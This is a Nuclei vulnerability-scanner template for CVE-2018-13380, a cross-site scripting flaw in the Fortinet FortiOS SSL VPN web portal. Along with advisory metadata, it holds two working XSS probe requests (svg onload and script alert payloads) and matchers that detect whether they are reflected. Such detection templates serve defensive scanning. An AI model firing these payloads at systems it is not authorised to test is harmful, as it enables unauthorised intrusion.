nuclei-templates/http/cves/2018/CVE-2018-13380.yaml

id: CVE-2018-13380

info:
  name: Fortinet FortiOS - Cross-Site Scripting
  author: shelld3v,AaronChen0
  severity: medium
  description: Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.0 to 5.6.7, 5.4.0 to 5.4.12, 5.2 and below versions under SSL VPN web portal are vulnerable to cross-site scripting and allows attacker to execute unauthorized malicious script code via the error or message handling parameters.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Apply the latest security patches or updates provided by Fortinet to fix this vulnerability.
  reference:
    - https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
    - https://fortiguard.com/advisory/FG-IR-18-383
    - https://fortiguard.com/advisory/FG-IR-20-230
    - https://nvd.nist.gov/vuln/detail/CVE-2018-13380
    - https://github.com/merlinepedra25/nuclei-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2018-13380
    cwe-id: CWE-79
    epss-score: 0.00122
    epss-percentile: 0.46406
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortios
  tags: cve,cve2018,fortios,xss,fortinet

http:
  - method: GET
    path:
      - "{{BaseURL}}/message?title=x&msg=%26%23%3Csvg/onload=alert(1337)%3E%3B"
      - "{{BaseURL}}/remote/error?errmsg=ABABAB--%3E%3Cscript%3Ealert(1337)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<svg/onload=alert(1337)>"
          - "<script>alert(1337)</script>"
        condition: or

      - type: word
        part: header
        negative: true
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502206ce45dc62265ae4f6192bec17dcdd2579840de84d6a70b1d94b162f3c44d36300221009e122123ca302b8c7791dae1933312958f9d3f1e0e89daf77aaa2b2dd224bd2f:922c64590222798bb761d5b6d8e72950